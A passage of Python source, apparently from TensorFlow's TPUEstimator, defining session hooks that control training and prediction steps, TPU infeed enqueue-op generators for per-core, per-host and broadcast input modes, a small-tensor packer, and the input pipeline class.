tf.compat.v1.logging.info('Shutdown TPU system.')
session.run(self._finalize_ops)
class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook):
def __init__(self,
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op,
rendezvous=None,
master=None,
session_config=None):
super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__(
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op=tpu_compile_op,
run_infeed_loop_on_coordinator=False,
rendezvous=rendezvous,
master=master,
session_config=session_config)
def _create_infeed_controller(self, name, target, args):
return _OpSignalOnceQueueContext(name=name, target=target, args=args)
class _TPUStopAtStepHook(tf.compat.v1.train.SessionRunHook):
"""Hook that requests stop at a specified step.
This hook is similar to the `session_run_hook._StopAfterNEvalsHook` with
following differences for TPU training:
1. This hook sets the variable for `iterations_per_loop`, which is used by
`TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed.
If the `iterations_per_loop` value is specified as time in seconds, the
number of iterations per `Session.run` will be estimated automatically
based on per iteration runtime.
As the hook execution order is not guaranteed, the variable update is
handled in `after_create_session` and `after_run` as
`TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`.
2. For each training loop (session.run), the global step could be increased
multiple times on TPU. The global step tensor value will be explicitly read
again in `after_run` to ensure the latest value is retrieved to avoid race
condition.
"""
def __init__(self,
iterations_per_loop_counter,
num_steps=None,
final_step=None):
"""Initializes a `TPUStopAtStepHook`.
Args:
iterations_per_loop_counter: A namedtuple of [`value',`unit`] that
represents the number of 'iterations count' or 'time in seconds' to run
optimizer per loop, based on the `unit` specified, `count` or `seconds`
respectively.
num_steps: Number of steps to execute.
final_step: Step after which to stop.
Raises:
ValueError: If one of the arguments is invalid.
"""
if num_steps is None and final_step is None:
raise ValueError('One of `num_steps` or `final_step` must be specified.')
if num_steps is not None and final_step is not None:
raise ValueError(
'Only one of `num_steps` or `final_step` can be specified.')
self._iterations_per_loop_counter = iterations_per_loop_counter
if self._iterations_per_loop_counter.unit not in ['seconds', 'count']:
raise ValueError('Only `count` or `seconds` are accepted as the '
'`iterations_per_loop_counter.unit')
self._num_steps = num_steps
self._final_step = final_step
self._next_iteration_count = 1
self._iteration_count_estimator = None
if self._iterations_per_loop_counter.unit == 'seconds':
self._iteration_count_estimator = (
iteration_count_estimator.IterationCountEstimator())
self._start_time = time.time()
def _next_iterations(self, global_step, final_step):
"""Computes the next iterations count.
The next iterations count is computed by choosing the smaller of the
remaining step count (`final_step` - `global_step`) and the estimated
iterations count returned by the estimator.
Args:
global_step: The current step.
final_step: Step after which to stop.
Returns:
The number of iterations count to run per loop.
"""
remaining_steps = final_step - global_step
if self._iteration_count_estimator is not None:
estimated_iterations = self._iteration_count_estimator.get(
self._iterations_per_loop_counter.value)
else:
estimated_iterations = self._iterations_per_loop_counter.value
self._next_iteration_count = min(remaining_steps, estimated_iterations)
return self._next_iteration_count
def begin(self):
"""Initializes variables.
Initializes the global step and iterations per loop variables.
Raises:
RuntimeError: An error occurred if global step variable does not exist.
"""
self._global_step_tensor = tf.compat.v1.train.get_global_step()
if self._global_step_tensor is None:
raise RuntimeError('Global step should be created.')
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
"""Computes and updates the first time iterations count.
The iterations are computed by choosing the smaller of the (`final step` -
`global step`), and the initial estimated iterations returned by the
estimator (by default is 1).
Args:
session: A TensorFlow Session that has been created.
coord: A Coordinator object which keeps track of all threads.
"""
global_step = session.run(self._global_step_tensor)
if self._final_step is None:
self._final_step = global_step + self._num_steps
iterations = self._next_iterations(global_step, self._final_step)
self._iterations_per_loop_var.load(iterations, session=session)
def before_run(self, run_context):
"""Reset the timer."""
if self._iteration_count_estimator is not None:
self._start_time = time.time()
def after_run(self, run_context, run_values):
"""Computes the next iterations per loop value or terminates.
Computes the elapsed time to run the last optimizer loop and if the
`IterationCountEstimator` is used, records the elapsed time and iterations
count. If the final step count has been reached, terminates. Otherwise,
computes and updates the number of iterations to run the optimizer per loop.
Args:
run_context: A `SessionRunContext` object.
run_values: A SessionRunValues object.
"""
if self._iteration_count_estimator is not None:
elapsed_time = time.time() - self._start_time
tf.compat.v1.logging.info('ElapsedTime: %.3f', elapsed_time)
self._iteration_count_estimator.update(elapsed_time,
self._next_iteration_count)
# Global step cannot be retrieved via SessionRunArgs and before_run due to
# race condition.
global_step = run_context.session.run(self._global_step_tensor)
if global_step >= self._final_step:
run_context.request_stop()
else:
iterations = self._next_iterations(global_step, self._final_step)
self._iterations_per_loop_var.load(
iterations, session=run_context.session)
class _SetEvalIterationsHook(tf.compat.v1.train.SessionRunHook):
"""Hook that requests stop at a specified step."""
def __init__(self, num_steps):
"""Initializes a `_SetEvalIterationsHook`.
Args:
num_steps: Number of steps to execute.
"""
self._num_steps = num_steps
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
self._iterations_per_loop_var.load(self._num_steps, session=session)
class _StoppingPredictHook(tf.compat.v1.train.SessionRunHook):
"""Hook that requests stop according to the stopping signal in prediction."""
def __init__(self, scalar_stopping_signal):
self._scalar_stopping_signal = scalar_stopping_signal
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
# This is not necessary as we do not run infeed enqueue and outfeed dequeue
# in side threads for prediction model. But it makes the
# TPUInfeedOutfeedSessionHook prints nice message.
self._iterations_per_loop_var.load(1, session=session)
def before_run(self, run_context):
return tf.compat.v1.train.SessionRunArgs(self._scalar_stopping_signal)
def after_run(self, run_context, run_values):
_ = run_context
scalar_stopping_signal = run_values.results
if _StopSignals.should_stop(scalar_stopping_signal):
# NOTE(xiejw): In prediction, stopping signals are inserted for each
# batch. And we append one more batch to signal the system it should stop.
# The data flow might look like
#
# batch 0: images, labels, stop = 0 (user provided)
# batch 1: images, labels, stop = 0 (user provided)
# ...
# batch 99: images, labels, stop = 0 (user provided)
# batch 100: images, labels, stop = 1 (TPUEstimator appended)
#
# where the final batch (id = 100) is appended by TPUEstimator, so we
# should drop it before returning the predictions to user.
# To achieve that, we throw the OutOfRangeError in after_run. Once
# Monitored Session sees this error in SessionRunHook.after_run, the
# "current" prediction, i.e., batch with id=100, will be discarded
# immediately
raise tf.errors.OutOfRangeError(None, None, 'Stopped by stopping signal.')
def generate_per_core_enqueue_ops_fn_for_host(ctx, input_fn,
inputs_structure_recorder,
host_device, host_id):
"""Generates infeed enqueue ops for per-core input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A fn returns enqueue_ops."""
num_cores_per_host = ctx.num_of_cores_per_host
per_host_sharded_inputs = []
for core_ordinal in range(num_cores_per_host):
with ops.name_scope('ordinal_%d' % (core_ordinal)):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=host_device,
invocation_index=host_id * ctx.num_of_cores_per_host + core_ordinal,
host_id=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
if inputs.is_dataset:
raise TypeError(
'`input_fn` returning `Dataset` is not yet supported in '
'per-Core input pipeline deployment yet. Please set '
'TPUConfig.per_host_input_for_training to True or return '
'`features` and `labels` from `input_fn`')
features, labels = inputs.features_and_labels()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_function_impl)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue
def generate_per_host_enqueue_ops_fn_for_host(ctx, input_fn,
inputs_structure_recorder,
batch_axis, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with tf.compat.v1.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=device,
invocation_index=host_id,
host_id=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
if batch_axis is not None:
raise TypeError('For mode PREDICT, batch_axis is not supported yet.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A Fn returning the TPU infeed enqueue ops.
By providing as a Fn, it can be invoked inside the tf.while_loop such that
the input pipeline for multiple iterations can be executed by one
Session.run call.
Returns:
list of dict of ops.
"""
with tf.compat.v1.device(device):
num_of_replicas_per_host = ctx.num_of_replicas_per_host
# Convert user input to features and labels. If the user returns a
# dataset, it is initialized and the features and labels extracted via
# `dataset.iterator.get_next()`
features, labels = inputs.features_and_labels()
signals = inputs.signals()
features, labels, enqueue_datas_list = (
_tpu_estimator_embedding.split_inputs(
ctx,
features,
labels,
num_cores_per_batch=num_of_replicas_per_host))
inputs_structure_recorder.validate_and_record_structure(features, labels)
unsharded_tensor_list = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
infeed_queue = tpu_feed.InfeedQueue(
tuple_types=[t.dtype for t in unsharded_tensor_list],
tuple_shapes=[t.shape for t in unsharded_tensor_list],
shard_dimensions=batch_axis)
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_number_of_shards(num_of_replicas_per_host)
per_host_enqueue_ops = (
infeed_queue.split_inputs_and_generate_enqueue_ops(
unsharded_tensor_list,
placement_function=lambda x: device,
tpu_ordinal_function=tpu_ordinal_function_impl))
if ctx.embedding_config:
per_host_enqueue_ops.extend(
ctx.embedding_config.tpu_embedding.generate_enqueue_ops(
enqueue_datas_list))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_per_host_v2_enqueue_ops_fn_for_host(ctx, input_fn,
inputs_structure_recorder,
device, host_id,
invocation_index):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with tf.compat.v1.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=device,
invocation_index=invocation_index,
host_id=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if not is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for the PER_HOST_V2 '
'input pipeline configuration.')
# Be aware that when num_cores_per_replica > num_cores_per_host,
# ctx.num_of_replicas_per_host is 0.
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True,
num_invocations_per_step=max(1, ctx.num_of_replicas_per_host))
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def device_function_impl(shard_id):
if ctx.device_assignment is not None:
# Find the replica_id of the host's logical core 0.
# The current host_id is guaranteed to contain the logical core 0,
# even when num_cores_per_replica > num_cores_per_host -- the function
# caller makes sure that this host_id will must be receiving data (calls
# input_fn).
replica_id = ctx.device_assignment.lookup_replicas(
task_id=host_id, logical_core=0)[shard_id]
return ctx.tpu_host_placement_function(replica_id=replica_id)
else:
return None
def enqueue_ops_fn():
"""Generates the per_host enqueue ops."""
control_deps = []
per_host_sharded_inputs = []
enqueue_datas_list = []
# Be aware that when num_cores_per_replica > num_cores_per_host,
# ctx.num_of_replicas_per_host is 0.
num_replicas_per_host = max(1, ctx.num_of_replicas_per_host)
cached_signals = None
with tf.compat.v1.device(device):
if not inputs.is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for this mode.')
for host in range(num_replicas_per_host):
# Use control dependencies to ensure a deterministic ordering.
if ctx.allow_per_host_v2_parallel_get_next:
features, labels = inputs.features_and_labels() # Calls get_next()
with tf.control_dependencies(control_deps):
if not ctx.allow_per_host_v2_parallel_get_next:
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
# All the replicas share the replica 0's stopping signal.
# This avoids inconsistent state among different model replcias.
if cached_signals:
signals['stopping'] = cached_signals['stopping']
else:
cached_signals = signals
features, labels, enqueue_data = (
_tpu_estimator_embedding.split_inputs(ctx, features, labels))
if len(enqueue_data) != 1:
raise RuntimeError(('Missing or extra enqueue_data for host {}. '
'len(enqueue_data) = {}.').format(
host, len(enqueue_data)))
enqueue_datas_list.append(enqueue_data[0])
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
if inputs_structure_recorder.flattened_input_dims:
input_partition_dims = inputs_structure_recorder.flattened_input_dims
if signals:
input_partition_dims += [None] * len(signals)
# pylint: disable=protected-access
infeed_queue = tpu_feed._PartitionedInfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]),
host_id=host_id,
input_partition_dims=input_partition_dims,
device_assignment=ctx.device_assignment)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs)
else:
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl)
captured_infeed_queue.capture(infeed_queue)
if ctx.embedding_config:
per_host_enqueue_ops.extend(
ctx.embedding_config.tpu_embedding.generate_enqueue_ops(
enqueue_datas_list))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_broadcast_enqueue_ops_fn(ctx, input_fn, inputs_structure_recorder,
num_hosts):
"""Generates infeed enqueue ops for one input_fn on all the hosts."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
device_0 = ctx.tpu_host_placement_function(host_id=0)
with tf.compat.v1.device(device_0):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device_0, invocation_index=0, host_id=0)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
num_replicas_per_host = ctx.num_of_replicas_per_host
def tpu_ordinal_function_impl(shard_id):
if ctx.device_assignment:
return ctx.device_assignment.tpu_ordinal(replica=shard_id)
else:
return shard_id % num_replicas_per_host
def device_function_impl(shard_id):
# shard_id ranges from 0 to num_of_replicas_per_host - 1.
# A shard is a replica inside a host.
# In broadcast mode (generate_broadcast_enqueue_ops_fn), the enqueue ops
# are always executed on the first host. Thus shard_id equals to replica_id.
return ctx.tpu_host_placement_function(replica_id=shard_id)
def enqueue_ops_fn():
"""Generates enqueue ops for all the hosts."""
broadcasted_inputs = []
flattened_inputs = None # Cache result from input_fn.
signals = None
num_replicas = ctx.num_replicas
core_id = 0
for host_id in xrange(num_hosts):
with tf.compat.v1.device(
ctx.tpu_host_placement_function(host_id=host_id)):
for _ in xrange(ctx.num_of_replicas_per_host):
# Note: input_fn is only called once at host 0 for the first replica.
# The features and labels returned from that invocation are
# broadcasted to other replicas(including the replicas on other
# hosts).
if flattened_inputs is None:
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
input_slices = [
tf.split(x, num_replicas) for x in flattened_inputs
]
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
# for each core, slice out the flattened_inputs for each core.
broadcasted_inputs.append([x[core_id] for x in input_slices])
core_id += 1
else:
broadcasted_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(broadcasted_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
enqueue_ops = infeed_queue.generate_enqueue_ops(
broadcasted_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl)
if signals is None:
return enqueue_ops
else:
return {
'ops': enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
class TensorPacker(object):
"""Pack and unpack small tensors into a big one for efficiency."""
def __init__(self, small_feature_dim_size,
minimum_num_small_features_to_group):
self._small_feature_dim_size = small_feature_dim_size
self._minimum_num_small_features_to_group = (
minimum_num_small_features_to_group)
def maybe_concatenate_features(self, features):
"""If there are enough small tensors, concat them for performance."""
self._small_feature_names = {}
self._small_feature_sizes = {}
feature_names = _extract_key_names(features)
if feature_names: # Not a single tensor.
# First pass: see if it is worth concatenating the small features.
for name in feature_names:
tensor = features[name]
# We do not handle nested inputs here.
if not isinstance(tensor, tf.Tensor):
return
shape = tensor.get_shape().as_list()
dtype = tensor.dtype
if (len(shape) == 2 and shape[1] is not None and
shape[1] <= self._small_feature_dim_size):
tf.compat.v1.logging.log_first_n(
tf.compat.v1.logging.INFO,
'Found small feature: %s %s', 1, name, shape)
if tensor.dtype not in self._small_feature_names:
self._small_feature_names[dtype] = []
self._small_feature_sizes[dtype] = []
self._small_feature_names[dtype].append(name)
self._small_feature_sizes[dtype].append(shape[1])
dtypes_ = list(self._small_feature_names.keys())
for dtype in dtypes_:
# If we could find 5 (or more) [batch_size, 1] dense features,
# we will group them.
if (len(self._small_feature_names[dtype]) <
self._minimum_num_small_features_to_group):
self._small_feature_names.pop(dtype) # reset
self._small_feature_sizes.pop(dtype) # reset
# Second pass: separate small features out
small_feature_tensors = {}
for dtype in self._small_feature_names:
small_feature_tensors[dtype] = []
for name in self._small_feature_names[dtype]:
small_feature_tensors[dtype].append(features.pop(name))
# Add the concat Tensor to features with a special key.
for dtype in self._small_feature_names:
key = self._get_small_feature_key(dtype)
if key in features:
raise ValueError('{} is reserved as feature key for concatenated'
'small features.')
features[key] = (tf.concat(small_feature_tensors[dtype], axis=1))
def maybe_split_features(self, maybe_concatenated_features):
for dtype in self._small_feature_names:
key = self._get_small_feature_key(dtype)
concatenated_small_features = maybe_concatenated_features.pop(key)
splits = tf.split(
concatenated_small_features, self._small_feature_sizes[dtype], axis=1)
for name, split in zip(self._small_feature_names[dtype], splits):
maybe_concatenated_features[name] = split
def _get_small_feature_key(self, dtype):
return _TENSOR_PACKER_CONCATENATED_SMALL_FEATURES_KEY + '_' + str(dtype)
class _InputPipeline(object):
"""`_InputPipeline` handles invoking `input_fn` and piping to infeed queue.
`_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from
call site. To be precise, based on the configuration in
`_InternalTPUContext`, it invokes `input_fn` for all cores (usually
multi-host TPU training) or for one host (usually for single-host TPU
evaluation), and sends all `features` and `labels` returned by `input_fn` to
TPU infeed. For per-core invocation, `features` and `labels` are piped to
infeed directly, one tuple for each core. For per-host invocation, `features`
and `labels` are split at host (with respect to `batch_axis`) and piped to all
cores accordingly.
In addition, flatten/unflatten are handled by `_InputPipeline` also. Model
inputs returned by the `input_fn` can have one of the following forms:
1. features
2. (features, labels)
3. ((arbitrarily nested structure of features), labels)
Internally, form 1 is reformed to `(features, None)` as features and labels
are passed separately to underlying methods. For TPU training, TPUEstimator
may expect multiple `features` and `labels` tuples one for each core.
TPUEstimator allows various different structures for inputs (namely `features`
and `labels`). Both `features` and `labels` can be any nested sturcture
supported by TF nest (namely, dict, tuples, namedtuples or any nested
structure of such of Tensors). `labels` could be `None` as well.
These are flattened before they are passed to the infeed/outfeed library
as that expectes flattend lists.
"""
class InputsStructureRecorder(object):
"""The recorder to record inputs structure."""
def __init__(self, input_partition_dims=None):
# Holds the structure of inputs
self._feature_structure = {}
self._flattened_input_dims = None
if input_partition_dims:
# This should have been validated in TPUConfig.
assert len(input_partition_dims) <= 2, 'must have 1 or 2 elements.'
if len(input_partition_dims) == 2:
self._feature_dims, self._label_dims = input_partition_dims
else:
self._feature_dims = input_partition_dims[0]
self._label_dims = None
assert self._feature_dims is not None, ('input_partition_dims[0] must '
'not be None')
else:
self._feature_dims = None
self._label_dims = None
# Internal state.
self._initialized = False
@property
def flattened_input_dims(self):
assert self._initialized, 'InputsStructureRecorder is not initialized.'
return self._flattened_input_dims
def has_labels(self):
return 'labels' in self._feature_structure
def _flatten_input_dims(self, features, labels, feature_dims, label_dims):
"""Flatten input dims with the same order as flattened input tensors."""
try:
flattened_input_dims = data_nest.flatten_up_to(features, feature_dims)
except TypeError as e:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched the structure of'
' features. input_partition_dims[0]: {}, features {}. {}'.format(
feature_dims, features, e))
if labels is not None:
if label_dims is not None:
try:
flattened_input_dims.extend(
data_nest.flatten_up_to(labels, self._label_dims))
except TypeError as e:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched the structure of'
' labels. input_partition_dims[1]: {}, labels: {}. {}'.format(
label_dims, labels, e))
else:
num_label_tensors = len(data_nest.flatten(labels))
flattened_input_dims.extend([None] * num_label_tensors)
return flattened_input_dims
def validate_and_record_structure(self, features, labels):
"""Validates and records the structure of `features` and `labels`."""
# Extract structure.
feature_names = _extract_key_names(features)
label_names = _extract_key_names(labels)
if not self._initialized:
# Record structure.
self._initialized = True
if self._feature_dims is not None:
feature_dims_names = _extract_key_names(self._feature_dims)
if feature_dims_names != feature_names:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched feature'
' keys. Expected {}, got {}'.format(feature_names,
feature_dims_names))
label_dims_names = _extract_key_names(self._label_dims)
if self._label_dims is not None and label_dims_names != label_names:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched label'
' keys. Expected {}, got {}'.format(label_names,
label_dims_names))
self._flattened_input_dims = self._flatten_input_dims(
features, labels, self._feature_dims, self._label_dims)
def flatten_features_and_labels(self, features, labels, signals=None):
"""Flattens the `features` and `labels` to a single tensor list."""
self.tensor_packer = TensorPacker(
_TENSOR_PACKER_SMALL_FEATURE_DIM_SIZE,
_TENSOR_PACKER_MINIMUM_NUM_SMALL_FEATURES_TO_GROUP)
self.tensor_packer.maybe_concatenate_features(features)
self._feature_structure['features'] = features
if labels is not None:
self._feature_structure['labels'] = labels
if signals is not None:
self._feature_structure['signals'] = signals
return data_nest.flatten(self._feature_structure)
def unflatten_features_and_labels(self, flattened_inputs):
"""Restores the flattened inputs to original features and labels form.
Args:
flattened_inputs: Flattened inputs for each shard.
Returns:
A tuple of (`features`, `labels`), where `labels` could be None.
Each one, if present, should have identical structure (single tensor vs
dict) as the one returned by input_fn.
Raises:
ValueError: If the number of expected tensors from `flattened_inputs`
mismatches the recorded structure.
"""
unflattened_inputs = data_nest.pack_sequence_as(self._feature_structure,
flattened_inputs)
features = unflattened_inputs['features']
self.tensor_packer.maybe_split_features(features)
return _Inputs(
features,
unflattened_inputs.get('labels'),
signals=unflattened_inputs.get('signals'))
def __init__(self, input_fn, batch_axis, ctx):
"""Constructor.
Args:
input_fn: input fn for train or eval.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards.
ctx: A `_InternalTPUContext` instance with mode.
Raises:
ValueError: If both `sharded_features` and `num_cores` are `None`.
"""
self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder(
ctx.input_partition_dims)
self._sharded_per_core = ctx.is_input_sharded_per_core()
self._input_fn = input_fn
self._infeed_queue = None
self._ctx = ctx
self._batch_axis = batch_axis
def generate_infeed_enqueue_ops_and_dequeue_fn(self):
"""Generates infeed enqueue ops and dequeue_fn."""
# While tf.while_loop is called, the body function, which invokes
# `enqueue_fn` passed in, is called to construct the graph. So, input_fn
# structure is recorded.
enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = (
self._invoke_input_fn_and_record_structure())
self._validate_input_pipeline()
def dequeue_fn():
"""dequeue_fn is used by TPU to retrieve the tensors."""
# In the model-parallel case, both the host-side and device-side
# computations must agree on the core on which infeed takes place. We
# choose to perform infeed on logical core 0 of each replica.
values = self._infeed_queue.generate_dequeue_op(tpu_device=0)
# The unflatten process uses the structure information recorded above.
return self._inputs_structure_recorder.unflatten_features_and_labels(
values)
return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator)
def _invoke_input_fn_and_record_structure(self):
"""Deploys the input pipeline and record input structure."""
enqueue_ops = []
infeed_queues = []
all_dataset_initializers = []
num_hosts = self._ctx.num_hosts
tpu_host_placement_fn = self._ctx.tpu_host_placement_function
run_infeed_loop_on_coordinator = True
if self._sharded_per_core:
# Per-Core input pipeline deployment.
# Invoke input pipeline for each core and placed on the corresponding
# host.
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with tf.compat.v1.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
enqueue_ops_fn, captured_infeed_queue = (
generate_per_core_enqueue_ops_fn_for_host(
self._ctx, self._input_fn, self._inputs_structure_recorder,
host_device, host_id))
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
run_infeed_loop_on_coordinator = False
enqueue_ops.append(
_wrap_computation_in_while_loop(
device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
# Infeed_queue_getter must be called after enqueue_ops_fn is called.
infeed_queues.append(captured_infeed_queue.get())
elif self._ctx.is_input_broadcast_with_iterators():
# Only calls input_fn in host 0.
host_device = tpu_host_placement_fn(host_id=0)
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_broadcast_enqueue_ops_fn(self._ctx, self._input_fn,
self._inputs_structure_recorder,
num_hosts))
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
else:
# This branch handles two senarios:
# num_cores_per_replica > num_cores_per_host
# and num_cores_per_replica <= num_cores_per_host
# First, get the set of host_ids, by iterating replicas.
# We only want and will get the set of *unique* host_ids
# *that will call input_fn*. For each replica, we only call the input_fn
# from the CPU host that contains logical core 0.
# Use a list here to ensure deterministic order.
host_id_with_invocation_id_pair = []
if not self._ctx.is_replica_across_hosts():
for host_id in range(num_hosts):
invocation_index = host_id
host_id_with_invocation_id_pair.append((host_id, invocation_index))
else:
for replica_id in xrange(self._ctx.num_replicas):
invocation_index = replica_id
host_device, _ = self._ctx.device_for_replica(replica_id)
# TODO(lehou): Get host_id in a better way.
host_id = int(host_device.split('/task:')[1].split('/device:')[0])
host_id_with_invocation_id_pair.append((host_id, invocation_index))
for (host_id, invocation_index) in host_id_with_invocation_id_pair:
host_device = tpu_host_placement_fn(host_id=host_id)
with tf.compat.v1.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
if self._ctx.is_input_per_host_with_iterators():
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_v2_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, host_device, host_id,
invocation_index))
else:
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, self._batch_axis,
host_device, host_id))
# NOTE(xiejw): We dispatch here based on the return type of the
# users `input_fn`.
#
# 1. If input_fn returns a Dataset instance, we initialize the
# iterator outside of tf.while_loop, and call the iterator.get_next
# inside tf.while_loop. This should be always safe.
#
# 2. If input_fn returns (features, labels), it is too late to wrap
# them inside tf.while_loop, as resource initialization cannot be
# handled in TF control flow properly. In this case, we will use
# python loop to enqueue the data into TPU system. This may be
# slow compared to the previous case.
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(
wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
# infeed_queue is used to generate dequeue ops. The only thing it uses for
# dequeue is dtypes and types. So, any one can be used. Here, grab the
# first one.
self._infeed_queue = infeed_queues[0]
return enqueue_ops, [
util_lib.MultiHostDatasetInitializerHook(all_dataset_initializers)
], run_infeed_loop_on_coordinator
def _validate_input_pipeline(self):
"""Validates the input pipeline.
Perform some sanity checks to log user friendly information. We should
error out to give users better error message. But, if
_WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior), we cannot break
user code, so, log a warning.
Raises:
RuntimeError: If the validation failed.
"""
if tf.compat.v1.get_default_graph().get_collection(
tf.compat.v1.GraphKeys.QUEUE_RUNNERS):
